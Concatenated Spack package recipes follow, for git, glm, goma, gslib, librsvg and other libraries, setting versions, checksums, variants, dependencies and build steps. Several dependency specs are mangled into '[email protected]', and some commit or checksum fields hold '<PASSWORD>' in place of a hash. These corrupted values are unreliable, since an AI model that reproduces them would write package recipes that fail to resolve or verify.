version('2.12.1', sha256='65d62d10caf317fc1daf2ca9975bdb09dbff874c92d24f9529d29a7784486b43', deprecated=True)
version('2.12.0', sha256='882f298daf582a07c597737eb4bbafb82c6208fe0e73c047defc12169c221a92', deprecated=True)
version('2.11.1', sha256='a1cdd7c820f92c44abb5003b36dc8cb7201ba38e8744802399f59c97285ca043', deprecated=True)
version('2.11.0', sha256='d3be9961c799562565f158ce5b836e2b90f38502d3992a115dfb653d7825fd7e', deprecated=True)
version('2.9.3', sha256='a252b6636b12d5ba57732c8469701544c26c2b1689933bd1b425e603cbb247c0', deprecated=True)
version('2.9.2', sha256='3cb09a3917c2d8150fc1708f3019cf99a8f0feee6cd61bba3797e3b2a85be9dc', deprecated=True)
version('2.9.1', sha256='c2230873bf77f93736473e6a06501bf93eed807d011107de6983dc015424b097', deprecated=True)
version('2.9.0', sha256='bff7560f5602fcd8e37669e0f65ef08c6edc996e4f324e4ed6bb8a84765e30bd', deprecated=True)
version('2.8.4', sha256='626e319f8a24fc0866167ea5f6bf3e2f38f69d6cb2e59e150f13709ca3ebf301', deprecated=True)
version('2.8.3', sha256='2dad50c758339d6f5235309db620e51249e0000ff34aa2f2acbcb84c2123ed09', deprecated=True)
version('2.8.2', sha256='a029c37ee2e0bb1efea5c4af827ff5afdb3356ec42fc19c1d40216d99e97e148', deprecated=True)
version('2.8.1', sha256='cfc66324179b9ed62ee02833f29d39935f4ab66874125a3ab9d5bb9055c0cb67', deprecated=True)
version('2.8.0', sha256='2c6eee5506237e0886df9973fd7938a1b2611ec93d07f64ed3447493ebac90d1', deprecated=True)
version('2.7.3', sha256='30d067499b61caddedaf1a407b4947244f14d10842d100f7c7c6ea1c288280cd', deprecated=True)
version('2.7.1', sha256='b4ab42798b7fb038eaefabb0c32ce9dbde2919103e5e2a35adc35dd46258a66f', deprecated=True)
for (_version, _sha256_manpage) in {
'2.36.1': '3fcd315976f06b54b0abb9c14d38c3d484f431ea4de70a706cc5dddc1799f4f7',
'2.35.2': '86e153bdd96edd8462cb7a5c57be1b2b670b033c18272b0aa2e6a102acce50be',
'2.35.1': 'd90da8b28fe0088519e0dc3c9f4bc85e429c7d6ccbaadcfe94aed47fb9c95504',
'2.35.0': 'c0408a1c944c8e481d7f507bd90a7ee43c34617a1a7af2d76a1898dcf44fa430',
'2.34.1': '220f1ed68582caeddf79c4db15e4eaa4808ec01fd11889e19232f0a74d7f31b0',
'2.34.0': 'fe66a69244def488306c3e05c1362ea53d8626d2a7e57cd7311df2dab1ef8356',
'2.33.1': '292b08ca1b79422ff478a6221980099c5e3c0a38aba39d952063eedb68e27d93',
'2.33.0': 'ba9cd0f29a3632a3b78f8ed2389f0780aa6e8fcbe258259d7c584920d19ed1f7',
'2.32.0': 'b5533c40ea1688231c0e2df51cc0d1c0272e17fe78a45ba6e60cb8f61fa4a53c',
'2.31.1': 'd330498aaaea6928b0abbbbb896f6f605efd8d35f23cbbb2de38c87a737d4543',
'2.31.0': 'a51b760c36be19113756839a9110b328a09abfff0d57f1c93ddac3974ccbc238',
'2.30.1': 'db323e1b242e9d0337363b1e538c8b879e4c46eedbf94d3bee9e65dab6d49138',
'2.30.0': 'e23035ae232c9a5eda57db258bc3b7f1c1060cfd66920f92c7d388b6439773a6',
'2.29.2': '68b258e6d590cb78e02c0df741bbaeab94cbbac6d25de9da4fb3882ee098307b',
'2.29.0': '8f3bf70ddb515674ce2e19572920a39b1be96af12032b77f1dd57898981fb151',
'2.28.0': '3cfca28a88d5b8112ea42322b797a500a14d0acddea391aed0462aff1ab11bf7',
'2.27.0': '414e4b17133e54d846f6bfa2479f9757c50e16c013eb76167a492ae5409b8947',
'2.26.0': 'c1ffaf0b4cd1e80a0eb0d4039e208c9d411ef94d5da44e38363804e1a7961218',
'2.25.0': '22b2380842ef75e9006c0358de250ead449e1376d7e5138070b9a3073ef61d44',
'2.23.0': 'a5b0998f95c2290386d191d34780d145ea67e527fac98541e0350749bf76be75',
'2.22.0': 'f6a5750dfc4a0aa5ec0c0cc495d4995d1f36ed47591c3941be9756c1c3a1aa0a',
'2.21.0': '14c76ebb4e31f9e55cf5338a04fd3a13bced0323cd51794ccf45fc74bd0c1080',
'2.20.1': 'e9c123463abd05e142defe44a8060ce6e9853dfd8c83b2542e38b7deac4e6d4c',
'2.19.2': '60334ecd59ee10319af4a7815174d10991d1afabacd3b3129d589f038bf25542',
'2.19.1': 'bd27f58dc90a661e3080b97365eb7322bfa185de95634fc59d98311925a7d894',
'2.18.0': '6cf38ab3ad43ccdcd6a73ffdcf2a016d56ab6b4b240a574b0bb96f520a04ff55',
'2.17.1': '9732053c1a618d2576c1751d0249e43702f632a571f84511331882beb360677d',
'2.17.0': '41b58c68e90e4c95265c75955ddd5b68f6491f4d57b2f17c6d68e60bbb07ba6a',
'2.15.1': '472454c494c9a7f50ad38060c3eec372f617de654b20f3eb3be59fc17a683fa1',
'2.14.1': '8c5810ce65d44cd333327d3a115c5b462712a2f81225d142e07bd889ad8dc0e0',
'2.13.0': 'e764721796cad175a4cf9a4afe7fb4c4fc57582f6f9a6e214239498e0835355b',
'2.12.2': '6e7ed503f1190734e57c9427df356b42020f125fa36ab0478777960a682adf50',
'2.12.1': '35e46b8acd529ea671d94035232b1795919be8f3c3a363ea9698f1fd08d7d061',
'2.12.0': '1f7733a44c59f9ae8dd321d68a033499a76c82046025cc2a6792299178138d65',
'2.11.1': 'ee567e7b0f95333816793714bb31c54e288cf8041f77a0092b85e62c9c2974f9',
'2.11.0': '437a0128acd707edce24e1a310ab2f09f9a09ee42de58a8e7641362012dcfe22',
'2.9.3': '8ea1a55b048fafbf0c0c6fcbca4b5b0f5e9917893221fc7345c09051d65832ce',
'2.9.2': 'ac5c600153d1e4a1c6494e250cd27ca288e7667ad8d4ea2f2386f60ba1b78eec',
'2.9.1': '324f5f173f2bd50b0102b66e474b81146ccc078d621efeb86d7f75e3c1de33e6',
'2.9.0': '35ba69a8560529aa837e395a6d6c8d42f4d29b40a3c1cc6e3dc69bb1faadb332',
'2.8.4': '953a8eadaf4ae96dbad2c3ec12384c677416843917ef83d94b98367ffd55afc0',
'2.8.3': '2dad50c758339d6f5235309db620e51249e0000ff34aa2f2acbcb84c2123ed09',
'2.8.2': '82d322211aade626d1eb3bcf3b76730bfdd2fcc9c189950fb0a8bdd69c383e2f',
'2.8.1': 'df46de0c172049f935cc3736361b263c5ff289b77077c73053e63ae83fcf43f4',
'2.8.0': '2c48902a69df3bec3b8b8f0350a65fd1b662d2f436f0e64d475ecd1c780767b6',
'2.7.3': '84b487c9071857ab0f15f11c4a102a583d59b524831cda0dc0954bd3ab73920b',
'2.7.1': '0313cf4d283336088883d8416692fb6c547512233e11dbf06e5b925b7e762d61'
}.items():
resource(
name='git-manpages',
url="https://www.kernel.org/pub/software/scm/git/git-manpages-{0}.tar.gz".format(_version),
sha256=_sha256_manpage,
placement='git-manpages',
when='@{0} +man'.format(_version))
variant('tcltk', default=False,
description='Gitk: provide Tcl/Tk in the run environment')
variant('svn', default=False,
description='Provide SVN Perl dependency in run environment')
variant('perl', default=True,
description='Do not use Perl scripts or libraries at all')
variant('nls', default=True,
description='Enable native language support')
variant('man', default=True,
description='Install manual pages')
variant('subtree', default=True,
description='Add git-subtree command and capability')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
depends_on('curl')
depends_on('expat')
depends_on('gettext', when='+nls')
depends_on('iconv')
depends_on('libidn2')
depends_on('openssl')
depends_on('pcre', when='@:2.13')
depends_on('pcre2', when='@2.14:')
depends_on('perl', when='+perl')
depends_on('zlib')
depends_on('openssh', type='run')
depends_on('perl-alien-svn', type='run', when='+svn')
depends_on('tk', type=('build', 'link'), when='+tcltk')
conflicts('+svn', when='~perl')
@classmethod
def determine_version(cls, exe):
output = Executable(exe)('--version', output=str, error=str)
match = re.search(
spack.fetch_strategy.GitFetchStrategy.git_version_re, output)
return match.group(1) if match else None
@classmethod
def determine_variants(cls, exes, version_str):
prefix = os.path.dirname(exes[0])
variants = ''
if 'gitk' in os.listdir(prefix):
variants += '+tcltk'
else:
variants += '~tcltk'
return variants
# See the comment in setup_build_environment re EXTLIBS.
def patch(self):
filter_file(r'^EXTLIBS =$',
'#EXTLIBS =',
'Makefile')
def setup_build_environment(self, env):
# We use EXTLIBS rather than LDFLAGS so that git's Makefile
# inserts the information into the proper place in the link commands
# (alongside the # other libraries/paths that configure discovers).
# LDFLAGS is inserted *before* libgit.a, which requires libintl.
# EXTFLAGS is inserted *after* libgit.a.
# This depends on the patch method above, which keeps the Makefile
# from stepping on the value that we pass in via the environment.
#
# The test avoids failures when git is an external package.
# In that case the node in the DAG gets truncated and git DOES NOT
# have a gettext dependency.
if '+nls' in self.spec:
if 'intl' in self.spec['gettext'].libs.names:
env.append_flags('EXTLIBS', '-L{0} -lintl'.format(
self.spec['gettext'].prefix.lib))
env.append_flags('CFLAGS', '-I{0}'.format(
self.spec['gettext'].prefix.include))
if '~perl' in self.spec:
env.append_flags('NO_PERL', '1')
def configure_args(self):
spec = self.spec
configure_args = [
'--with-curl={0}'.format(spec['curl'].prefix),
'--with-expat={0}'.format(spec['expat'].prefix),
'--with-iconv={0}'.format(spec['iconv'].prefix),
'--with-openssl={0}'.format(spec['openssl'].prefix),
'--with-zlib={0}'.format(spec['zlib'].prefix),
]
if '+perl' in self.spec:
configure_args.append('--with-perl={0}'.format(spec['perl'].command.path))
if '^pcre' in self.spec:
configure_args.append('--with-libpcre={0}'.format(
spec['pcre'].prefix))
if '^pcre2' in self.spec:
configure_args.append('--with-libpcre2={0}'.format(
spec['pcre2'].prefix))
if '+tcltk' in self.spec:
configure_args.append('--with-tcltk={0}'.format(
self.spec['tk'].prefix.bin.wish))
else:
configure_args.append('--without-tcltk')
return configure_args
@run_after('configure')
def filter_rt(self):
if self.spec.satisfies('platform=darwin'):
# Don't link with -lrt; the system has no (and needs no) librt
filter_file(r' -lrt$', '', 'Makefile')
def check(self):
make('test')
def build(self, spec, prefix):
args = []
if '~nls' in self.spec:
args.append('NO_GETTEXT=1')
make(*args)
if spec.satisfies('platform=darwin'):
with working_dir('contrib/credential/osxkeychain'):
make()
def install(self, spec, prefix):
args = ["install"]
if '~nls' in self.spec:
args.append('NO_GETTEXT=1')
make(*args)
if spec.satisfies('platform=darwin'):
install('contrib/credential/osxkeychain/git-credential-osxkeychain',
join_path(prefix, "libexec", "git-core"))
@run_after('install')
def install_completions(self):
install_tree('contrib/completion', self.prefix.share)
@run_after('install')
def install_manpages(self):
if '~man' in self.spec:
return
prefix = self.prefix
with working_dir('git-manpages'):
install_tree('man1', prefix.share.man.man1)
install_tree('man5', prefix.share.man.man5)
install_tree('man7', prefix.share.man.man7)
@run_after('install')
def install_subtree(self):
if '+subtree' in self.spec:
with working_dir('contrib/subtree'):
make_args = ['V=1', 'prefix={}'.format(self.prefix.bin)]
make(" ".join(make_args))
install_args = ['V=1', 'prefix={}'.format(self.prefix.bin), 'install']
make(" ".join(install_args))
install('git-subtree', self.prefix.bin)
def setup_run_environment(self, env):
# Setup run environment if using SVN extension
# Libs from perl-alien-svn and apr-util are required in
# LD_LIBRARY_PATH
# TODO: extend to other platforms
if "+svn platform=linux" in self.spec:
perl_svn = self.spec['perl-alien-svn']
env.prepend_path('LD_LIBRARY_PATH', join_path(
perl_svn.prefix, 'lib', 'perl5', 'x86_64-linux-thread-multi',
'Alien', 'SVN'))
```
#### File: packages/glm/package.py
```python
from spack.package import *
class Glm(CMakePackage):
"""OpenGL Mathematics (GLM) is a header only C++ mathematics library for
graphics software based on the OpenGL Shading Language (GLSL) specification
"""
homepage = "https://github.com/g-truc/glm"
url = "https://github.com/g-truc/glm/archive/0.9.9.8.tar.gz"
git = "https://github.com/g-truc/glm.git"
version('develop', branch="master")
version('0.9.9.8', sha256='7d508ab72cb5d43227a3711420f06ff99b0a0cb63ee2f93631b162bfe1fe9592')
version('0.9.7.1', sha256='285a0dc8f762b4e523c8710fbd97accaace0c61f45bc8be2bdb0deed07b0e6f3')
depends_on('[email protected]:', type='build')
depends_on('[email protected]:', type='build', when='@0.9.9.0:')
# CMake install target was removed in version 0.9.9.6
@when('@0.9.9.6:0.9.9.8')
def cmake(self, spec, prefix):
pass
@when('@0.9.9.6:0.9.9.8')
def build(self, spec, prefix):
pass
@when('@0.9.9.6:0.9.9.8')
def install(self, spec, prefix):
mkdirp(prefix.include.glm)
ignore_cmakelists = lambda p: p.endswith('CMakeLists.txt')
install_tree('glm', prefix.include.glm, ignore=ignore_cmakelists)
mkdirp(prefix.lib64.cmake)
install_tree('cmake', prefix.lib64.cmake)
@when('@develop')
def cmake_args(self):
return [
self.define('GLM_TEST_ENABLE', self.run_tests)
]
```
#### File: packages/goma/package.py
```python
from spack.package import *
class Goma(CMakePackage):
"""A Full-Newton Finite Element Program for Free and Moving Boundary Problems with
Coupled Fluid/Solid Momentum, Energy, Mass, and Chemical Species Transport """
homepage = "https://www.gomafem.com"
url = "https://github.com/goma/goma/archive/v7.0.0.tar.gz"
git = "https://github.com/goma/goma.git"
maintainers = ['wortiz']
version('7.0.4', commit='<PASSWORD>')
version('7.0.0', commit='<PASSWORD>')
version('main', branch='main')
version('develop', branch='develop')
# Problem size variants
variant('max_conc', default='4', values=('4', '8', '10', '15', '20'),
description="Set internal maximum number of species")
variant('max_external_field', default='4', values=('4', '8', '10', '15', '20'),
description="Set internal maximum number of external fields")
variant('max_prob_var', default='15', values=('10', '15', '20', '25', '28', '34', '40', '46', '64'),
description="Set internal maximum number of active equations")
variant('mde', default='27', values=('8', '9', '10', '16', '20', '27', '54'),
description="Set internal maximum DOF per element")
# Floating point checks
variant('check_finite', default=True, description="Enable finite computation check")
variant('fpe', default=False, description="Enable floating point exception")
# Optional third party libraries
variant('arpack-ng', default=True, description="Build with ARPACK support")
variant('metis', default=True, description="Build with metis decomposition")
variant('omega-h', default=True, description="Build with Omega_h support")
variant('petsc', default=True, description="Build with PETSc solver support")
variant('sparse', default=True, description="Build with legacy sparse solver")
variant('suite-sparse', default=True, description="Build with UMFPACK support")
# Required dependencies
depends_on('mpi')
depends_on('seacas+applications')
depends_on('trilinos+mpi+epetra+aztec+amesos+stratimikos+teko+mumps+superlu-dist+ml~exodus')
# Optional dependencies
depends_on('arpack-ng', when='+arpack-ng')
depends_on('metis', when='+metis')
depends_on('omega-h+mpi', when='+omega-h')
depends_on('petsc+hypre+mpi~exodusii', when='+petsc')
depends_on('sparse', when='+sparse')
depends_on('suite-sparse', when='+suite-sparse')
def cmake_args(self):
args = []
# Problem sizes
args.append(self.define_from_variant('MAX_CONC', 'max_conc'))
args.append(
self.define_from_variant('MAX_EXTERNAL_FIELD', 'max_external_field'))
args.append(self.define_from_variant('MAX_PROB_VAR', 'max_prob_var'))
args.append(self.define_from_variant('MDE', 'mde'))
# Floating point error checks
args.append(self.define_from_variant('CHECK_FINITE', 'check_finite'))
args.append(self.define_from_variant('FP_EXCEPT', 'fpe'))
# Configure optional libraries
args.append(self.define_from_variant('ENABLE_ARPACK', 'arpack-ng'))
args.append(self.define_from_variant('ENABLE_METIS', 'metis'))
args.append(self.define_from_variant('ENABLE_OMEGA_H', 'omega-h'))
args.append(self.define_from_variant('ENABLE_PETSC', 'petsc'))
args.append(self.define_from_variant('ENABLE_SPARSE', 'sparse'))
args.append(self.define_from_variant('ENABLE_UMFPACK', 'suite-sparse'))
return args
```
#### File: packages/go-md2man/package.py
```python
from spack.package import *
class GoMd2man(Package):
"""go-md2man converts markdown into roff (man pages)"""
homepage = "https://github.com/cpuguy83/go-md2man"
url = "https://github.com/cpuguy83/go-md2man/archive/v1.0.10.tar.gz"
version('1.0.10', sha256='76aa56849123b99b95fcea2b15502fd886dead9a5c35be7f78bdc2bad6be8d99')
depends_on('go')
resource(name='blackfriday',
url='https://github.com/russross/blackfriday/archive/v1.5.2.tar.gz',
sha256='626138a08abb8579474a555e9d45cb5260629a2c07e8834428620a650dc9f195',
placement='blackfriday',
destination=join_path('src', 'github.com', 'russross'))
def patch(self):
mkdirp(join_path(self.stage.source_path,
'src', 'github.com', 'russross'))
mkdirp(join_path(self.stage.source_path,
'src', 'github.com', 'cpuguy83'))
ln = which('ln')
ln('-s', self.stage.source_path, join_path(
'src', 'github.com', 'cpuguy83', 'go-md2man'))
def install(self, spec, prefix):
with working_dir('src'):
env['GOPATH'] = self.stage.source_path
env['GO111MODULE'] = 'off'
go = which('go')
go('build', '-v', join_path(
'github.com', 'cpuguy83', 'go-md2man'))
mkdir(prefix.bin)
install('go-md2man', prefix.bin)
```
#### File: packages/gslib/package.py
```python
from spack.package import *
class Gslib(Package):
"""Highly scalable Gather-scatter code with AMG and XXT solvers"""
homepage = "https://github.com/gslib/gslib"
git = "https://github.com/gslib/gslib.git"
version('develop', branch='master')
version('1.0.7', tag='v1.0.7')
version('1.0.6', tag='v1.0.6')
version('1.0.5', tag='v1.0.5')
version('1.0.4', tag='v1.0.4')
version('1.0.3', tag='v1.0.3')
version('1.0.2', tag='v1.0.2')
version('1.0.1', tag='v1.0.1')
version('1.0.0', tag='v1.0.0')
variant('mpi', default=True, description='Build with MPI')
variant('mpiio', default=True, description='Build with MPI I/O')
variant('blas', default=False, description='Build with BLAS')
depends_on('mpi', when="+mpi")
depends_on('mpi', when="+mpiio")
depends_on('blas', when="+blas")
conflicts('~mpi', when='+mpiio')
def install(self, spec, prefix):
src_dir = 'src'
lib_dir = 'lib'
libname = 'libgs.a'
if self.spec.satisfies('@1.0.1:'):
makefile = 'Makefile'
else:
makefile = 'src/Makefile'
cc = self.compiler.cc
if '+mpiio' not in spec:
filter_file(r'MPIIO.*?=.*1', 'MPIIO = 0', makefile)
if '+mpi' in spec:
cc = spec['mpi'].mpicc
else:
filter_file(r'MPI.*?=.*1', 'MPI = 0', makefile)
filter_file(r'MPIIO.*?=.*1', 'MPIIO = 0', makefile)
make_cmd = "CC=" + cc
if '+blas' in spec:
filter_file(r'BLAS.*?=.*0', 'BLAS = 1', makefile)
blas = spec['blas'].libs
ld_flags = blas.ld_flags
filter_file(r'\$\(LDFLAGS\)', ld_flags, makefile)
if self.spec.satisfies('@1.0.3:'):
make(make_cmd)
make('install', 'INSTALL_ROOT=%s' % self.prefix)
else:
if self.spec.satisfies('@1.0.1:'):
make(make_cmd)
make('install')
install_tree(lib_dir, prefix.lib)
elif self.version == Version('1.0.0'):
with working_dir(src_dir):
make(make_cmd)
mkdir(prefix.lib)
install(libname, prefix.lib)
# Should only install the headers (this will be fixed in gslib on
# future releases).
install_tree(src_dir, prefix.include)
```
#### File: packages/herwigpp/package.py
```python
from spack.package import *
from spack.pkg.builtin.boost import Boost
class Herwigpp(AutotoolsPackage):
"""Herwig is a multi-purpose particle physics event generator.
This package provides old Herwig++ 2 generator"""
homepage = "https://herwig.hepforge.org/"
url = "http://lcgpackages.web.cern.ch/lcgpackages/tarFiles/sources/MCGeneratorsTarFiles/Herwig++-2.7.1.tar.bz2"
tags = ['hep']
version('2.7.1', '<PASSWORD>')
patch('herwig++-2.7.1.patch', when='@2.7.1', level=0)
depends_on('gsl')
# TODO: replace this with an explicit list of components of Boost,
# for instance depends_on('boost +filesystem')
# See https://github.com/spack/spack/pull/22303 for reference
depends_on(Boost.with_default_variants)
depends_on('fastjet')
depends_on('[email protected]', when='@2.7.1')
def setup_build_environment(self, env):
env.prepend_path('LD_LIBRARY_PATH', self.spec['thepeg'].prefix.lib.ThePEG)
def configure_args(self):
args = ['--with-gsl=' + self.spec['gsl'].prefix,
'--with-thepeg=' + self.spec['thepeg'].prefix,
'--with-fastjet=' + self.spec['fastjet'].prefix,
'--with-boost=' + self.spec['boost'].prefix]
return args
def build(self, spec, prefix):
make()
with working_dir('Contrib'):
make()
with working_dir('Contrib/AlpGen'):
make('BasicLesHouchesFileReader.so',
"HERWIGINCLUDE=-I{0}/include".format(self.stage.source_path))
make('AlpGenHandler.so',
"HERWIGINCLUDE=-I{0}/include".format(self.stage.source_path))
def install(self, spec, prefix):
make('install')
install(
join_path(self.stage.source_path,
'Contrib', 'AlpGen', 'AlpGenHandler.so'),
join_path(prefix.lib, 'Herwig++', 'AlpGenHandler.so'))
install(
join_path(self.stage.source_path,
'Contrib', 'AlpGen', 'BasicLesHouchesFileReader.so'),
join_path(prefix.lib, 'Herwig++', 'BasicLesHouchesFileReader.so'))
```
#### File: packages/iegenlib/package.py
```python
from spack.package import *
class Iegenlib(CMakePackage):
"""Inspector/Executor Generation Library for manipulating sets
and relations with uninterpreted function symbols. """
homepage = "https://github.com/CompOpt4Apps/IEGenLib"
git = "https://github.com/CompOpt4Apps/IEGenLib.git"
url = "https://github.com/CompOpt4Apps/IEGenLib/archive/fc479ee6ff01dba26beffc1dc6bacdba03262138.zip"
maintainers = ['dhuth']
version('master', branch='master')
version('2018-07-03',
url="https://github.com/CompOpt4Apps/IEGenLib/archive/fc479ee6ff01dba26beffc1dc6bacdba03262138.zip",
sha256='b4c0b368363fcc1e34b388057cc0940bb87fc336cebb0772fd6055f45009b12b')
depends_on('[email protected]:', type='build')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('texinfo', type='build')
depends_on('isl')
build_directory = 'spack-build'
@run_before('cmake')
def make_dirs(self):
autoreconf = which('autoreconf')
with working_dir('lib/isl'):
autoreconf('-i')
mkdirp('spack-build/bin')
def cmake_args(self):
args = []
args.append('-DGEN_PARSER=no')
args.append('-DBUILD_PYTHON=no')
return args
```
#### File: packages/libconfuse/package.py
```python
from spack.package import *
class Libconfuse(AutotoolsPackage):
"""Small configuration file parser library for C."""
homepage = "https://github.com/martinh/libconfuse"
url = "https://github.com/martinh/libconfuse/archive/v3.2.2.tar.gz"
version('3.2.2', sha256='2cf7e032980aff8f488efba61510dc3fb95e9a4b9183f985dea457a5651b0e2c')
version('3.2.1', sha256='2eff8e3c300c4ed1d67fdb13f9d31a72a68e31874b4640db15334305bc40cebd')
depends_on('m4', type='build')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('gettext', type='build')
depends_on('flex', type='build')
def autoreconf(self, spec, prefix):
bash = which('bash')
bash('./autogen.sh')
```
#### File: packages/libfive/package.py
```python
from spack.package import *
from spack.pkg.builtin.boost import Boost
class Libfive(CMakePackage):
"""libfive is a software library and set of tools for solid modeling."""
homepage = "https://libfive.com"
git = "https://github.com/libfive/libfive.git"
# https://libfive.com/download/ recommends working from the master branch
# and currently, all tags are from 2017:
version('master', branch='master')
depends_on('pkgconfig', type='build')
depends_on('[email protected]:', type='build')
depends_on('[email protected]:')
# TODO: replace this with an explicit list of components of Boost,
# for instance depends_on('boost +filesystem')
# See https://github.com/spack/spack/pull/22303 for reference
depends_on(Boost.with_default_variants)
depends_on('[email protected]:')
depends_on('libpng')
depends_on('python@3:', when='+python', type=('link', 'run'))
depends_on('[email protected]:', when='+guile')
# In case build of future git master fails, check raising the minimum Qt version
depends_on('[email protected]:+opengl', when='+qt')
variant('qt', default=True, description='Enable Studio UI(with Guile or Python)')
variant('guile', default=True, description='Enable Guile support for Studio UI')
variant('python', default=True, description='Enable Python support for Studio UI')
variant('packed_opcodes', default=False,
description='packed opcodes breaks compatibility with saved f-reps!')
def cmake_args(self):
if self.spec.satisfies('+qt~guile~python'):
raise InstallError('The Qt-based Studio UI (+qt) needs +guile or +python!')
return [self.define_from_variant('BUILD_STUDIO_APP', 'qt'),
self.define_from_variant('BUILD_GUILE_BINDINGS', 'guile'),
self.define_from_variant('BUILD_PYTHON_BINDINGS', 'python'),
self.define_from_variant('LIBFIVE_PACKED_OPCODES', 'packed_opcodes')]
```
#### File: packages/libfms/package.py
```python
from spack.package import *
class Libfms(CMakePackage):
"""Field and Mesh Specification (FMS) library"""
homepage = "https://github.com/CEED/FMS"
git = "https://github.com/CEED/FMS.git"
tags = ['FEM', 'Meshes', 'Fields', 'High-order', 'I/O', 'Data-exchange']
maintainers = ['v-dobrev', 'tzanio', 'cwsmith']
version('develop', branch='master')
version('0.2.0', tag='v0.2')
variant('conduit', default=True,
description='Build with Conduit I/O support')
variant('shared', default=True,
description='Build shared libraries')
depends_on('[email protected]:', type='build')
depends_on('[email protected]:', when='+conduit')
def cmake_args(self):
args = []
args.extend([
self.define_from_variant('BUILD_SHARED_LIBS', 'shared'),
])
if '+conduit' in self.spec:
args.extend([
self.define('CONDUIT_DIR', self.spec['conduit'].prefix)
])
return args
@property
def headers(self):
"""Export the FMS headers.
Sample usage: spec['libfms'].headers.cpp_flags
"""
fms_h_names = ['fms', 'fmsio']
hdrs = find_headers(fms_h_names, self.prefix.include, recursive=False)
return hdrs or None # Raise an error if no headers are found
@property
def libs(self):
"""Export the FMS library.
Sample usage: spec['libfms'].libs.ld_flags
"""
is_shared = '+shared' in self.spec
libs = find_libraries('libfms', root=self.prefix, shared=is_shared,
recursive=True)
return libs or None # Raise an error if no libs are found
```
#### File: packages/libnotify/package.py
```python
from spack.package import *
class Libnotify(MesonPackage):
"""libnotify is a library for sending desktop notifications"""
homepage = "https://github.com/GNOME/libnotify"
url = "https://github.com/GNOME/libnotify/archive/0.7.9.tar.gz"
version('0.7.9', sha256='9bd4f5fa911d27567e7cc2d2d09d69356c16703c4e8d22c0b49a5c45651f3af0')
# Libnotify is having trouble with finding the DTD and XSLT for docbook,
# which is required for both of these varients.
# variant('docbook', default=False,
# description='Build docbook docs. Currently broken')
# variant('gtkdoc', default=False,
# description='Build with gtkdoc. Currently broken')
depends_on('pkgconfig', type='build')
depends_on('[email protected]:')
depends_on('[email protected]:')
depends_on('gobject-introspection')
depends_on('libxslt', type='build')
depends_on('docbook-xsl', type='build')
# depends_on('gtk-doc', when='+gtkdoc', type='build')
# depends_on('xmlto', when='+docbook', type='build')
patch('docbook-location.patch')
def meson_args(self):
# spec = self.spec
args = []
# if '+docbook' in spec:
# args.append('-Ddocbook_docs=enabled')
# else:
# args.append('-Ddocbook_docs=disabled')
args.append('-Ddocbook_docs=disabled')
# if self.run_tests:
# args.append('-Dtests=true')
# else:
# args.append('-Dtests=false')
args.append('-Dtests=false')
# if '+gtkdoc' in spec:
# args.append('-Dgtk_doc=true')
# else:
# args.append('-Dgtk_doc=false')
args.append('-Dgtk_doc=false')
return args
```
#### File: packages/libpsml/package.py
```python
from spack.package import *
class Libpsml(AutotoolsPackage):
"""libPSML is a library to handle pseudopotentials in PSML format."""
homepage = "https://gitlab.com/siesta-project/libraries/libpsml"
git = "https://gitlab.com/siesta-project/libraries/libpsml.git"
url = "https://gitlab.com/siesta-project/libraries/libpsml/-/archive/libpsml-1.1.10/libpsml-libpsml-1.1.10.tar.gz"
version('1.1.10', sha256='ba87ece7d443a42a5db3a119c555a29a391a060dd6f3f5039a2c6ea248b7fe84')
version('1.1.9', sha256='04b8de33c555ae94a790116cd3cf7b6c9e8ec9a018562edff544a2e04876cf0c')
version('1.1.8', sha256='77498783be1bc7006819f36c42477b5913464b8c660203f7d6b7f7e25aa29145')
version('1.1.7', sha256='b3f5431fd3965b66fe01b899c0c3ef73d9f969d67329cd1f5aba84fb056b5dd1')
version('1.1.6', sha256='521647dbd945b208e5d468fceeb2bc397737d9a659e2c7549597bf4eb29f60df')
depends_on('[email protected]:', type='build')
depends_on('[email protected]:', type='build')
depends_on('[email protected]:', type='build')
depends_on('m4', type='build')
depends_on('xmlf90')
def configure_args(self):
return ['--with-xmlf90=%s' % self.spec['xmlf90'].prefix]
```
#### File: packages/librsvg/package.py
```python
from spack.package import *
class Librsvg(AutotoolsPackage):
"""Library to render SVG files using Cairo"""
homepage = "https://wiki.gnome.org/Projects/LibRsvg"
url = "https://download.gnome.org/sources/librsvg/2.44/librsvg-2.44.14.tar.xz"
version('2.51.0', sha256='89d32e38445025e1b1d9af3dd9d3aeb9f6fce527aeecbecf38b369b34c80c038')
version('2.50.2', sha256='6211f271ce4cd44a7318190d36712e9cea384a933d3e3570004edeb210a056d3')
version('2.50.0', sha256='b3fadba240f09b9c9898ab20cb7311467243e607cf8f928b7c5f842474ee3df4')
version('2.44.14', sha256='6a85a7868639cdd4aa064245cc8e9d864dad8b8e9a4a8031bb09a4796bc4e303')
variant('doc', default=False, description='Build documentation with gtk-doc')
depends_on("gobject-introspection", type='build')
depends_on("pkgconfig", type='build')
depends_on("rust", type='build')
depends_on('gtk-doc', type='build', when='+doc')
depends_on("cairo+gobject")
depends_on("gdk-pixbuf")
depends_on("glib")
depends_on("libcroco")
depends_on("pango")
depends_on('libffi')
depends_on('libxml2')
depends_on('shared-mime-info')
def url_for_version(self, version):
url = "https://download.gnome.org/sources/librsvg/"
url += "{0}/librsvg-{1}.tar.xz"
return url.format(version.up_to(2), version)
def setup_dependent_build_environment(self, env, dependent_spec):
env.prepend_path('XDG_DATA_DIRS', self.prefix.share)
def setup_dependent_run_environment(self, env, dependent_spec):
env.prepend_path('XDG_DATA_DIRS', self.prefix.share)
def setup_build_environment(self, env):
env.prepend_path('XDG_DATA_DIRS', self.prefix.share)
# librsvg uses pthread_atfork() but does not use -pthread on Ubuntu 18.04 %gcc@8
env.append_flags('LDFLAGS', '-pthread')
def setup_run_environment(self, env):
env.prepend_path('XDG_DATA_DIRS', self.prefix.share)
def configure_args(self):
return [
'--enable-gtk-doc=' + ('yes' if self.spec.variants['doc'].value else 'no')
]
```
#### File: packages/lshw/package.py
```python
from spack.package import *
class Lshw(MakefilePackage):
"""
lshw is a small tool to provide detailed information on the
hardware configuration of the machine. It can report exact memory
configuration, firmware version, mainboard configuration, CPU version
and speed, cache configuration, bus speed, etc. on DMI-capable x86 or
EFI (IA-64) systems and on some ARM and PowerPC machines.
"""
homepage = "https://github.com/lyonel/lshw"
